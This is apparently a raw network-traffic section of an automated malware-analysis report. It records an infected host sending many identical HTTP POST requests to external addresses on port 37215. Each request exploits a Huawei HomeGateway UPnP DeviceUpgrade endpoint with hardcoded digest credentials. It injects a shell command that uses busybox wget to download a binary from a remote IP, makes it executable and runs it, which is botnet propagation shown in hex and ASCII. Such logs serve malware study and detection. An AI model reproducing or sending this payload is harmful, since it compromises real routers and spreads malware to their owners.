                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1514192.168.2.155740641.175.90.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107814074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1515192.168.2.154432841.93.205.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107861996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1516192.168.2.154884841.134.234.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107875109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1517192.168.2.154002441.136.143.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107880116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1518192.168.2.153474041.24.19.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107881069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1519192.168.2.155040641.169.23.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107881069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1520192.168.2.155316641.37.15.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107902050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1521192.168.2.155333841.180.111.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107952118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1522192.168.2.153786241.243.51.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107959032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1523192.168.2.153505641.128.181.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107959986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
